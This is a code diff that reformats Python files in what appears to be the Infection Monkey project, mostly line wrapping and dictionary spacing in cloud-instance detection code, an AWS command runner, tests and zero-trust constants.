diff --git a/envs/monkey_zoo/blackbox/analyzers/performance_analyzer.py b/envs/monkey_zoo/blackbox/analyzers/performance_analyzer.py
index 18390e67e..30e635652 100644
--- a/envs/monkey_zoo/blackbox/analyzers/performance_analyzer.py
+++ b/envs/monkey_zoo/blackbox/analyzers/performance_analyzer.py
@@ -33,7 +33,8 @@ class PerformanceAnalyzer(Analyzer):
if self.performance_test_config.break_on_timeout and not performance_is_good_enough:
LOGGER.warning(
- "Calling breakpoint - pausing to enable investigation of island. Type 'c' to continue once you're done "
+ "Calling breakpoint - pausing to enable investigation of island. "
+ "Type 'c' to continue once you're done "
"investigating. Type 'p timings' and 'p total_time' to see performance information."
)
breakpoint()
diff --git a/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/fake_monkey.py b/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/fake_monkey.py
index 2a39e6353..59501b6db 100644
--- a/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/fake_monkey.py
+++ b/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/fake_monkey.py
@@ -1,6 +1,7 @@
import random
-from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import (
+from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.\
+ sample_multiplier.fake_ip_generator import (
FakeIpGenerator,
)
diff --git a/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/sample_multiplier.py b/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/sample_multiplier.py
index 7a1fb4032..981aa22a6 100644
--- a/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/sample_multiplier.py
+++ b/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/sample_multiplier.py
@@ -9,10 +9,12 @@ from tqdm import tqdm
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_file_parser import (
SampleFileParser,
)
-from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import (
+from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.\
+ sample_multiplier.fake_ip_generator import (
FakeIpGenerator,
)
-from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_monkey import (
+from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.\
+ sample_multiplier.fake_monkey import (
FakeMonkey,
)
diff --git a/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/test_fake_ip_generator.py b/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/test_fake_ip_generator.py
index 7a4f30cff..3b18032d6 100644
--- a/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/test_fake_ip_generator.py
+++ b/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/test_fake_ip_generator.py
@@ -1,6 +1,7 @@
from unittest import TestCase
-from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import (
+from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.\
+ sample_multiplier.fake_ip_generator import (
FakeIpGenerator,
)
diff --git a/monkey/common/cloud/aws/aws_instance.py b/monkey/common/cloud/aws/aws_instance.py
index 236cde5e1..27c56f0a5 100644
--- a/monkey/common/cloud/aws/aws_instance.py
+++ b/monkey/common/cloud/aws/aws_instance.py
@@ -9,7 +9,6 @@ from common.cloud.instance import CloudInstance
__author__ = "itay.mizeretz"
-
AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS = "169.254.169.254"
AWS_LATEST_METADATA_URI_PREFIX = "http://{0}/latest/".format(AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS)
ACCOUNT_ID_KEY = "accountId"
@@ -35,32 +34,34 @@ class AwsInstance(CloudInstance):
try:
response = requests.get(
- AWS_LATEST_METADATA_URI_PREFIX + "meta-data/instance-id", timeout=2
+ AWS_LATEST_METADATA_URI_PREFIX + "meta-data/instance-id", timeout=2
)
self.instance_id = response.text if response else None
self.region = self._parse_region(
- requests.get(
- AWS_LATEST_METADATA_URI_PREFIX + "meta-data/placement/availability-zone"
- ).text
+ requests.get(
+ AWS_LATEST_METADATA_URI_PREFIX + "meta-data/placement/availability-zone"
+ ).text
)
except (requests.RequestException, IOError) as e:
logger.debug("Failed init of AwsInstance while getting metadata: {}".format(e))
try:
self.account_id = self._extract_account_id(
- requests.get(
- AWS_LATEST_METADATA_URI_PREFIX + "dynamic/instance-identity/document", timeout=2
- ).text
+ requests.get(
+ AWS_LATEST_METADATA_URI_PREFIX + "dynamic/instance-identity/document",
+ timeout=2
+ ).text
)
except (requests.RequestException, json.decoder.JSONDecodeError, IOError) as e:
logger.debug(
- "Failed init of AwsInstance while getting dynamic instance data: {}".format(e)
+ "Failed init of AwsInstance while getting dynamic instance data: {}".format(e)
)
@staticmethod
def _parse_region(region_url_response):
# For a list of regions, see:
- # https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts.RegionsAndAvailabilityZones.html
+    # https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/
+    # Concepts.RegionsAndAvailabilityZones.html
# This regex will find any AWS region format string in the response.
re_phrase = r"((?:us|eu|ap|ca|cn|sa)-[a-z]*-[0-9])"
finding = re.findall(re_phrase, region_url_response, re.IGNORECASE)
@@ -79,9 +80,11 @@ class AwsInstance(CloudInstance):
def _extract_account_id(instance_identity_document_response):
"""
Extracts the account id from the dynamic/instance-identity/document metadata path.
- Based on https://forums.aws.amazon.com/message.jspa?messageID=409028 which has a few more solutions,
+ Based on https://forums.aws.amazon.com/message.jspa?messageID=409028 which has a few more
+ solutions,
in case Amazon break this mechanism.
- :param instance_identity_document_response: json returned via the web page ../dynamic/instance-identity/document
+ :param instance_identity_document_response: json returned via the web page
+ ../dynamic/instance-identity/document
:return: The account id
"""
return json.loads(instance_identity_document_response)[ACCOUNT_ID_KEY]
diff --git a/monkey/common/cloud/aws/aws_service.py b/monkey/common/cloud/aws/aws_service.py
index 0825811a9..189d77336 100644
--- a/monkey/common/cloud/aws/aws_service.py
+++ b/monkey/common/cloud/aws/aws_service.py
@@ -20,10 +20,10 @@ logger = logging.getLogger(__name__)
def filter_instance_data_from_aws_response(response):
return [
{
- "instance_id": x[INSTANCE_ID_KEY],
- "name": x[COMPUTER_NAME_KEY],
- "os": x[PLATFORM_TYPE_KEY].lower(),
- "ip_address": x[IP_ADDRESS_KEY],
+ "instance_id":x[INSTANCE_ID_KEY],
+ "name":x[COMPUTER_NAME_KEY],
+ "os":x[PLATFORM_TYPE_KEY].lower(),
+ "ip_address":x[IP_ADDRESS_KEY],
}
for x in response[INSTANCE_INFORMATION_LIST_KEY]
]
@@ -31,12 +31,14 @@ def filter_instance_data_from_aws_response(response):
class AwsService(object):
"""
- A wrapper class around the boto3 client and session modules, which supplies various AWS services.
+ A wrapper class around the boto3 client and session modules, which supplies various AWS
+ services.
This class will assume:
1. That it's running on an EC2 instance
2. That the instance is associated with the correct IAM role. See
- https://boto3.amazonaws.com/v1/documentation/api/latest/guide/configuration.html#iam-role for details.
+ https://boto3.amazonaws.com/v1/documentation/api/latest/guide/configuration.html#iam-role
+ for details.
"""
region = None
@@ -48,7 +50,7 @@ class AwsService(object):
@staticmethod
def get_client(client_type, region=None):
return boto3.client(
- client_type, region_name=region if region is not None else AwsService.region
+ client_type, region_name=region if region is not None else AwsService.region
)
@staticmethod
@@ -73,7 +75,8 @@ class AwsService(object):
Get the information for all instances with the relevant roles.
This function will assume that it's running on an EC2 instance with the correct IAM role.
- See https://boto3.amazonaws.com/v1/documentation/api/latest/guide/configuration.html#iam-role for details.
+        See https://boto3.amazonaws.com/v1/documentation/api/latest/guide/
+        configuration.html#iam-role for details.
:raises: botocore.exceptions.ClientError if can't describe local instance information.
:return: All visible instances from this instance
diff --git a/monkey/common/cloud/aws/test_aws_instance.py b/monkey/common/cloud/aws/test_aws_instance.py
index d3c89f067..88b392d58 100644
--- a/monkey/common/cloud/aws/test_aws_instance.py
+++ b/monkey/common/cloud/aws/test_aws_instance.py
@@ -30,7 +30,6 @@ INSTANCE_IDENTITY_DOCUMENT_RESPONSE = """
}
"""
-
EXPECTED_INSTANCE_ID = "i-1234567890abcdef0"
EXPECTED_REGION = "us-west-2"
@@ -39,14 +38,14 @@ EXPECTED_ACCOUNT_ID = "123456789012"
def get_test_aws_instance(
- text={"instance_id": None, "region": None, "account_id": None},
- exception={"instance_id": None, "region": None, "account_id": None},
+ text={"instance_id":None, "region":None, "account_id":None},
+ exception={"instance_id":None, "region":None, "account_id":None},
):
with requests_mock.Mocker() as m:
# request made to get instance_id
url = f"{AWS_LATEST_METADATA_URI_PREFIX}meta-data/instance-id"
m.get(url, text=text["instance_id"]) if text["instance_id"] else m.get(
- url, exc=exception["instance_id"]
+ url, exc=exception["instance_id"]
)
# request made to get region
@@ -56,7 +55,7 @@ def get_test_aws_instance(
# request made to get account_id
url = f"{AWS_LATEST_METADATA_URI_PREFIX}dynamic/instance-identity/document"
m.get(url, text=text["account_id"]) if text["account_id"] else m.get(
- url, exc=exception["account_id"]
+ url, exc=exception["account_id"]
)
test_aws_instance_object = AwsInstance()
@@ -67,11 +66,11 @@ def get_test_aws_instance(
@pytest.fixture
def good_data_mock_instance():
return get_test_aws_instance(
- text={
- "instance_id": INSTANCE_ID_RESPONSE,
- "region": AVAILABILITY_ZONE_RESPONSE,
- "account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
- }
+ text={
+ "instance_id":INSTANCE_ID_RESPONSE,
+ "region":AVAILABILITY_ZONE_RESPONSE,
+ "account_id":INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
+ }
)
@@ -99,11 +98,11 @@ def test_get_account_id_good_data(good_data_mock_instance):
@pytest.fixture
def bad_region_data_mock_instance():
return get_test_aws_instance(
- text={
- "instance_id": INSTANCE_ID_RESPONSE,
- "region": "in-a-different-world",
- "account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
- }
+ text={
+ "instance_id":INSTANCE_ID_RESPONSE,
+ "region":"in-a-different-world",
+ "account_id":INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
+ }
)
@@ -131,11 +130,11 @@ def test_get_account_id_bad_region_data(bad_region_data_mock_instance):
@pytest.fixture
def bad_account_id_data_mock_instance():
return get_test_aws_instance(
- text={
- "instance_id": INSTANCE_ID_RESPONSE,
- "region": AVAILABILITY_ZONE_RESPONSE,
- "account_id": "who-am-i",
- }
+ text={
+ "instance_id":INSTANCE_ID_RESPONSE,
+ "region":AVAILABILITY_ZONE_RESPONSE,
+ "account_id":"who-am-i",
+ }
)
@@ -163,12 +162,12 @@ def test_get_account_id_data_bad_account_id_data(bad_account_id_data_mock_instan
@pytest.fixture
def bad_instance_id_request_mock_instance(instance_id_exception):
return get_test_aws_instance(
- text={
- "instance_id": None,
- "region": AVAILABILITY_ZONE_RESPONSE,
- "account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
- },
- exception={"instance_id": instance_id_exception, "region": None, "account_id": None},
+ text={
+ "instance_id":None,
+ "region":AVAILABILITY_ZONE_RESPONSE,
+ "account_id":INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
+ },
+ exception={"instance_id":instance_id_exception, "region":None, "account_id":None},
)
@@ -201,12 +200,12 @@ def test_get_account_id_bad_instance_id_request(bad_instance_id_request_mock_ins
@pytest.fixture
def bad_region_request_mock_instance(region_exception):
return get_test_aws_instance(
- text={
- "instance_id": INSTANCE_ID_RESPONSE,
- "region": None,
- "account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
- },
- exception={"instance_id": None, "region": region_exception, "account_id": None},
+ text={
+ "instance_id":INSTANCE_ID_RESPONSE,
+ "region":None,
+ "account_id":INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
+ },
+ exception={"instance_id":None, "region":region_exception, "account_id":None},
)
@@ -239,12 +238,12 @@ def test_get_account_id_bad_region_request(bad_region_request_mock_instance):
@pytest.fixture
def bad_account_id_request_mock_instance(account_id_exception):
return get_test_aws_instance(
- text={
- "instance_id": INSTANCE_ID_RESPONSE,
- "region": AVAILABILITY_ZONE_RESPONSE,
- "account_id": None,
- },
- exception={"instance_id": None, "region": None, "account_id": account_id_exception},
+ text={
+ "instance_id":INSTANCE_ID_RESPONSE,
+ "region":AVAILABILITY_ZONE_RESPONSE,
+ "account_id":None,
+ },
+ exception={"instance_id":None, "region":None, "account_id":account_id_exception},
)
diff --git a/monkey/common/cloud/aws/test_aws_service.py b/monkey/common/cloud/aws/test_aws_service.py
index 8b17d707d..d9ce32a57 100644
--- a/monkey/common/cloud/aws/test_aws_service.py
+++ b/monkey/common/cloud/aws/test_aws_service.py
@@ -50,9 +50,9 @@ class TestFilterInstanceDataFromAwsResponse(TestCase):
"""
self.assertEqual(
- filter_instance_data_from_aws_response(json.loads(json_response_empty)), []
+ filter_instance_data_from_aws_response(json.loads(json_response_empty)), []
)
self.assertEqual(
- filter_instance_data_from_aws_response(json.loads(json_response_full)),
- [{"instance_id": "string", "ip_address": "string", "name": "string", "os": "string"}],
+ filter_instance_data_from_aws_response(json.loads(json_response_full)),
+ [{"instance_id":"string", "ip_address":"string", "name":"string", "os":"string"}],
)
diff --git a/monkey/common/cloud/azure/azure_instance.py b/monkey/common/cloud/azure/azure_instance.py
index 186ce3c9d..289e6b942 100644
--- a/monkey/common/cloud/azure/azure_instance.py
+++ b/monkey/common/cloud/azure/azure_instance.py
@@ -9,7 +9,8 @@ from common.common_consts.timeouts import SHORT_REQUEST_TIMEOUT
LATEST_AZURE_METADATA_API_VERSION = "2019-04-30"
AZURE_METADATA_SERVICE_URL = (
- "http://169.254.169.254/metadata/instance?api-version=%s" % LATEST_AZURE_METADATA_API_VERSION
+ "http://169.254.169.254/metadata/instance?api-version=%s" %
+ LATEST_AZURE_METADATA_API_VERSION
)
logger = logging.getLogger(__name__)
@@ -18,7 +19,8 @@ logger = logging.getLogger(__name__)
class AzureInstance(CloudInstance):
"""
Access to useful information about the current machine if it's an Azure VM.
- Based on Azure metadata service: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service
+ Based on Azure metadata service:
+ https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service
"""
def is_instance(self):
@@ -38,13 +40,14 @@ class AzureInstance(CloudInstance):
try:
response = requests.get(
- AZURE_METADATA_SERVICE_URL,
- headers={"Metadata": "true"},
- timeout=SHORT_REQUEST_TIMEOUT,
+ AZURE_METADATA_SERVICE_URL,
+ headers={"Metadata":"true"},
+ timeout=SHORT_REQUEST_TIMEOUT,
)
# If not on cloud, the metadata URL is non-routable and the connection will fail.
- # If on AWS, should get 404 since the metadata service URL is different, so bool(response) will be false.
+ # If on AWS, should get 404 since the metadata service URL is different,
+ # so bool(response) will be false.
if response:
logger.debug("Trying to parse Azure metadata.")
self.try_parse_response(response)
@@ -52,7 +55,8 @@ class AzureInstance(CloudInstance):
logger.warning(f"Metadata response not ok: {response.status_code}")
except requests.RequestException:
logger.debug(
- "Failed to get response from Azure metadata service: This instance is not on Azure."
+ "Failed to get response from Azure metadata service: This instance is not on "
+ "Azure."
)
def try_parse_response(self, response):
diff --git a/monkey/common/cloud/azure/test_azure_instance.py b/monkey/common/cloud/azure/test_azure_instance.py
index fb1e01abb..10e372c05 100644
--- a/monkey/common/cloud/azure/test_azure_instance.py
+++ b/monkey/common/cloud/azure/test_azure_instance.py
@@ -7,108 +7,113 @@ from common.cloud.azure.azure_instance import AZURE_METADATA_SERVICE_URL, AzureI
from common.cloud.environment_names import Environment
GOOD_DATA = {
- "compute": {
- "azEnvironment": "AZUREPUBLICCLOUD",
- "isHostCompatibilityLayerVm": "true",
- "licenseType": "Windows_Client",
- "location": "westus",
- "name": "examplevmname",
- "offer": "Windows",
- "osProfile": {
- "adminUsername": "admin",
- "computerName": "examplevmname",
- "disablePasswordAuthentication": "true",
+ "compute":{
+ "azEnvironment":"AZUREPUBLICCLOUD",
+ "isHostCompatibilityLayerVm":"true",
+ "licenseType":"Windows_Client",
+ "location":"westus",
+ "name":"examplevmname",
+ "offer":"Windows",
+ "osProfile":{
+ "adminUsername":"admin",
+ "computerName":"examplevmname",
+ "disablePasswordAuthentication":"true",
},
- "osType": "linux",
- "placementGroupId": "f67c14ab-e92c-408c-ae2d-da15866ec79a",
- "plan": {"name": "planName", "product": "planProduct", "publisher": "planPublisher"},
- "platformFaultDomain": "36",
- "platformUpdateDomain": "42",
- "publicKeys": [
- {"keyData": "ssh-rsa 0", "path": "/home/user/.ssh/authorized_keys0"},
- {"keyData": "ssh-rsa 1", "path": "/home/user/.ssh/authorized_keys1"},
+ "osType":"linux",
+ "placementGroupId":"f67c14ab-e92c-408c-ae2d-da15866ec79a",
+ "plan":{"name":"planName", "product":"planProduct", "publisher":"planPublisher"},
+ "platformFaultDomain":"36",
+ "platformUpdateDomain":"42",
+ "publicKeys":[
+ {"keyData":"ssh-rsa 0", "path":"/home/user/.ssh/authorized_keys0"},
+ {"keyData":"ssh-rsa 1", "path":"/home/user/.ssh/authorized_keys1"},
],
- "publisher": "RDFE-Test-Microsoft-Windows-Server-Group",
- "resourceGroupName": "macikgo-test-may-23",
- "resourceId": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/resourceGroups/macikgo-test-may-23/"
- "providers/Microsoft.Compute/virtualMachines/examplevmname",
- "securityProfile": {"secureBootEnabled": "true", "virtualTpmEnabled": "false"},
- "sku": "Windows-Server-2012-R2-Datacenter",
- "storageProfile": {
- "dataDisks": [
+ "publisher":"RDFE-Test-Microsoft-Windows-Server-Group",
+ "resourceGroupName":"macikgo-test-may-23",
+ "resourceId":"/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/resourceGroups/macikgo-test"
+ "-may-23/"
+ "providers/Microsoft.Compute/virtualMachines/examplevmname",
+ "securityProfile":{"secureBootEnabled":"true", "virtualTpmEnabled":"false"},
+ "sku":"Windows-Server-2012-R2-Datacenter",
+ "storageProfile":{
+ "dataDisks":[
{
- "caching": "None",
- "createOption": "Empty",
- "diskSizeGB": "1024",
- "image": {"uri": ""},
- "lun": "0",
- "managedDisk": {
- "id": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/"
- "resourceGroups/macikgo-test-may-23/providers/"
- "Microsoft.Compute/disks/exampledatadiskname",
- "storageAccountType": "Standard_LRS",
+ "caching":"None",
+ "createOption":"Empty",
+ "diskSizeGB":"1024",
+ "image":{"uri":""},
+ "lun":"0",
+ "managedDisk":{
+ "id":"/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/"
+ "resourceGroups/macikgo-test-may-23/providers/"
+ "Microsoft.Compute/disks/exampledatadiskname",
+ "storageAccountType":"Standard_LRS",
},
- "name": "exampledatadiskname",
- "vhd": {"uri": ""},
- "writeAcceleratorEnabled": "false",
+ "name":"exampledatadiskname",
+ "vhd":{"uri":""},
+ "writeAcceleratorEnabled":"false",
}
],
- "imageReference": {
- "id": "",
- "offer": "UbuntuServer",
- "publisher": "Canonical",
- "sku": "16.04.0-LTS",
- "version": "latest",
+ "imageReference":{
+ "id":"",
+ "offer":"UbuntuServer",
+ "publisher":"Canonical",
+ "sku":"16.04.0-LTS",
+ "version":"latest",
},
- "osDisk": {
- "caching": "ReadWrite",
- "createOption": "FromImage",
- "diskSizeGB": "30",
- "diffDiskSettings": {"option": "Local"},
- "encryptionSettings": {"enabled": "false"},
- "image": {"uri": ""},
- "managedDisk": {
- "id": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/"
- "resourceGroups/macikgo-test-may-23/providers/"
- "Microsoft.Compute/disks/exampleosdiskname",
- "storageAccountType": "Standard_LRS",
+ "osDisk":{
+ "caching":"ReadWrite",
+ "createOption":"FromImage",
+ "diskSizeGB":"30",
+ "diffDiskSettings":{"option":"Local"},
+ "encryptionSettings":{"enabled":"false"},
+ "image":{"uri":""},
+ "managedDisk":{
+ "id":"/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/"
+ "resourceGroups/macikgo-test-may-23/providers/"
+ "Microsoft.Compute/disks/exampleosdiskname",
+ "storageAccountType":"Standard_LRS",
},
- "name": "exampleosdiskname",
- "osType": "Linux",
- "vhd": {"uri": ""},
- "writeAcceleratorEnabled": "false",
+ "name":"exampleosdiskname",
+ "osType":"Linux",
+ "vhd":{"uri":""},
+ "writeAcceleratorEnabled":"false",
},
},
- "subscriptionId": "xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx",
- "tags": "baz:bash;foo:bar",
- "version": "15.05.22",
- "vmId": "02aab8a4-74ef-476e-8182-f6d2ba4166a6",
- "vmScaleSetName": "crpteste9vflji9",
- "vmSize": "Standard_A3",
- "zone": "",
+ "subscriptionId":"xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx",
+ "tags":"baz:bash;foo:bar",
+ "version":"15.05.22",
+ "vmId":"02aab8a4-74ef-476e-8182-f6d2ba4166a6",
+ "vmScaleSetName":"crpteste9vflji9",
+ "vmSize":"Standard_A3",
+ "zone":"",
},
- "network": {
- "interface": [
+ "network":{
+ "interface":[
{
- "ipv4": {
- "ipAddress": [{"privateIpAddress": "10.144.133.132", "publicIpAddress": ""}],
- "subnet": [{"address": "10.144.133.128", "prefix": "26"}],
+ "ipv4":{
+ "ipAddress":[{"privateIpAddress":"10.144.133.132", "publicIpAddress":""}],
+ "subnet":[{"address":"10.144.133.128", "prefix":"26"}],
},
- "ipv6": {"ipAddress": []},
- "macAddress": "0011AAFFBB22",
+ "ipv6":{"ipAddress":[]},
+ "macAddress":"0011AAFFBB22",
}
]
},
}
+BAD_DATA_NOT_JSON = (
+    "\n\n\n\n\n"
+    "Waiting..."
+    "\n\n\n \n\n"
+)
-BAD_DATA_NOT_JSON = '\n\n\n\n\nWaiting...\n\n\n \n\n'
-
-
-BAD_DATA_JSON = {"": ""}
+BAD_DATA_JSON = {"":""}
def get_test_azure_instance(url, **kwargs):
diff --git a/monkey/common/cloud/gcp/gcp_instance.py b/monkey/common/cloud/gcp/gcp_instance.py
index 14e4e554a..a2858f702 100644
--- a/monkey/common/cloud/gcp/gcp_instance.py
+++ b/monkey/common/cloud/gcp/gcp_instance.py
@@ -8,13 +8,13 @@ from common.common_consts.timeouts import SHORT_REQUEST_TIMEOUT
logger = logging.getLogger(__name__)
-
GCP_METADATA_SERVICE_URL = "http://metadata.google.internal/"
class GcpInstance(CloudInstance):
"""
- Used to determine if on GCP. See https://cloud.google.com/compute/docs/storing-retrieving-metadata#runninggce
+    Used to determine if on GCP. See
+    https://cloud.google.com/compute/docs/storing-retrieving-metadata#runninggce
"""
def is_instance(self):
@@ -39,16 +39,16 @@ class GcpInstance(CloudInstance):
else:
if not response.headers["Metadata-Flavor"] == "Google":
logger.warning(
- "Got unexpected Metadata flavor: {}".format(
- response.headers["Metadata-Flavor"]
- )
+ "Got unexpected Metadata flavor: {}".format(
+ response.headers["Metadata-Flavor"]
+ )
)
else:
logger.warning(
- "On GCP, but metadata response not ok: {}".format(response.status_code)
+ "On GCP, but metadata response not ok: {}".format(response.status_code)
)
except requests.RequestException:
logger.debug(
- "Failed to get response from GCP metadata service: This instance is not on GCP"
+ "Failed to get response from GCP metadata service: This instance is not on GCP"
)
self._on_gcp = False
diff --git a/monkey/common/cmd/aws/aws_cmd_result.py b/monkey/common/cmd/aws/aws_cmd_result.py
index 1e89115ef..37eb3c6dd 100644
--- a/monkey/common/cmd/aws/aws_cmd_result.py
+++ b/monkey/common/cmd/aws/aws_cmd_result.py
@@ -10,21 +10,22 @@ class AwsCmdResult(CmdResult):
def __init__(self, command_info):
super(AwsCmdResult, self).__init__(
- self.is_successful(command_info, True),
- command_info["ResponseCode"],
- command_info["StandardOutputContent"],
- command_info["StandardErrorContent"],
+ self.is_successful(command_info, True),
+ command_info["ResponseCode"],
+ command_info["StandardOutputContent"],
+ command_info["StandardErrorContent"],
)
self.command_info = command_info
@staticmethod
def is_successful(command_info, is_timeout=False):
"""
- Determines whether the command was successful. If it timed out and was still in progress, we assume it worked.
+ Determines whether the command was successful. If it timed out and was still in progress,
+ we assume it worked.
:param command_info: Command info struct (returned by ssm.get_command_invocation)
:param is_timeout: Whether the given command timed out
:return: True if successful, False otherwise.
"""
return (command_info["Status"] == "Success") or (
- is_timeout and (command_info["Status"] == "InProgress")
+ is_timeout and (command_info["Status"] == "InProgress")
)
diff --git a/monkey/common/cmd/aws/aws_cmd_runner.py b/monkey/common/cmd/aws/aws_cmd_runner.py
index 1ccdd104b..1b29625cf 100644
--- a/monkey/common/cmd/aws/aws_cmd_runner.py
+++ b/monkey/common/cmd/aws/aws_cmd_runner.py
@@ -38,8 +38,8 @@ class AwsCmdRunner(CmdRunner):
def run_command_async(self, command_line):
doc_name = "AWS-RunShellScript" if self.is_linux else "AWS-RunPowerShellScript"
command_res = self.ssm.send_command(
- DocumentName=doc_name,
- Parameters={"commands": [command_line]},
- InstanceIds=[self.instance_id],
+ DocumentName=doc_name,
+ Parameters={"commands":[command_line]},
+ InstanceIds=[self.instance_id],
)
return command_res["Command"]["CommandId"]
diff --git a/monkey/common/cmd/cmd_runner.py b/monkey/common/cmd/cmd_runner.py
index 57966d0b5..bb3f8805a 100644
--- a/monkey/common/cmd/cmd_runner.py
+++ b/monkey/common/cmd/cmd_runner.py
@@ -21,8 +21,10 @@ class CmdRunner(object):
* command id - any unique identifier of a command which was already run
* command result - represents the result of running a command. Always of type CmdResult
* command status - represents the current status of a command. Always of type CmdStatus
- * command info - Any consistent structure representing additional information of a command which was already run
- * instance - a machine that commands will be run on. Can be any dictionary with 'instance_id' as a field
+ * command info - Any consistent structure representing additional information of a command
+ which was already run
+ * instance - a machine that commands will be run on. Can be any dictionary with 'instance_id'
+ as a field
* instance_id - any unique identifier of an instance (machine). Can be of any format
"""
@@ -49,7 +51,8 @@ class CmdRunner(object):
"""
Run multiple commands on various instances
:param instances: List of instances.
- :param inst_to_cmd: Function which receives an instance, runs a command asynchronously and returns Cmd
+ :param inst_to_cmd: Function which receives an instance, runs a command asynchronously
+ and returns Cmd
:param inst_n_cmd_res_to_res: Function which receives an instance and CmdResult
and returns a parsed result (of any format)
:return: Dictionary with 'instance_id' as key and parsed result as value
@@ -92,7 +95,7 @@ class CmdRunner(object):
while (curr_time - init_time < timeout) and (len(commands) != 0):
for command in list(
- commands
+ commands
): # list(commands) clones the list. We do so because we remove items inside
CmdRunner._process_command(command, commands, results, True)
@@ -105,9 +108,9 @@ class CmdRunner(object):
for command, result in results:
if not result.is_success:
logger.error(
- "The following command failed: `%s`. status code: %s",
- str(command[1]),
- str(result.status_code),
+ "The following command failed: `%s`. status code: %s",
+ str(command[1]),
+ str(result.status_code),
)
return results
@@ -154,7 +157,7 @@ class CmdRunner(object):
try:
command_info = c_runner.query_command(c_id)
if (not should_process_only_finished) or c_runner.get_command_status(
- command_info
+ command_info
) != CmdStatus.IN_PROGRESS:
commands.remove(command)
results.append((command, c_runner.get_command_result(command_info)))
diff --git a/monkey/common/common_consts/zero_trust_consts.py b/monkey/common/common_consts/zero_trust_consts.py
index 539bb7265..ecf870baa 100644
--- a/monkey/common/common_consts/zero_trust_consts.py
+++ b/monkey/common/common_consts/zero_trust_consts.py
@@ -1,8 +1,10 @@
"""
-This file contains all the static data relating to Zero Trust. It is mostly used in the zero trust report generation and
+This file contains all the static data relating to Zero Trust. It is mostly used in the zero
+trust report generation and
in creating findings.
-This file contains static mappings between zero trust components such as: pillars, principles, tests, statuses.
+This file contains static mappings between zero trust components such as: pillars, principles,
+tests, statuses.
Some of the mappings are computed when this module is loaded.
"""
@@ -79,17 +81,24 @@ PRINCIPLE_DISASTER_RECOVERY = "data_backup"
PRINCIPLE_SECURE_AUTHENTICATION = "secure_authentication"
PRINCIPLE_MONITORING_AND_LOGGING = "monitoring_and_logging"
PRINCIPLES = {
- PRINCIPLE_SEGMENTATION: "Apply segmentation and micro-segmentation inside your network.",
- PRINCIPLE_ANALYZE_NETWORK_TRAFFIC: "Analyze network traffic for malicious activity.",
- PRINCIPLE_USER_BEHAVIOUR: "Adopt security user behavior analytics.",
- PRINCIPLE_ENDPOINT_SECURITY: "Use anti-virus and other traditional endpoint security solutions.",
- PRINCIPLE_DATA_CONFIDENTIALITY: "Ensure data's confidentiality by encrypting it.",
- PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES: "Configure network policies to be as restrictive as possible.",
- PRINCIPLE_USERS_MAC_POLICIES: "Users' permissions to the network and to resources should be MAC (Mandatory "
- "Access Control) only.",
- PRINCIPLE_DISASTER_RECOVERY: "Ensure data and infrastructure backups for disaster recovery scenarios.",
- PRINCIPLE_SECURE_AUTHENTICATION: "Ensure secure authentication process's.",
- PRINCIPLE_MONITORING_AND_LOGGING: "Ensure monitoring and logging in network resources.",
+    PRINCIPLE_SEGMENTATION:"Apply segmentation and "
+    "micro-segmentation "
+    "inside your "
+    "network.",
+ PRINCIPLE_ANALYZE_NETWORK_TRAFFIC:"Analyze network traffic for malicious activity.",
+ PRINCIPLE_USER_BEHAVIOUR:"Adopt security user behavior analytics.",
+ PRINCIPLE_ENDPOINT_SECURITY:"Use anti-virus and other traditional endpoint "
+ "security solutions.",
+ PRINCIPLE_DATA_CONFIDENTIALITY:"Ensure data's confidentiality by encrypting it.",
+ PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES:"Configure network policies to be as restrictive as "
+ "possible.",
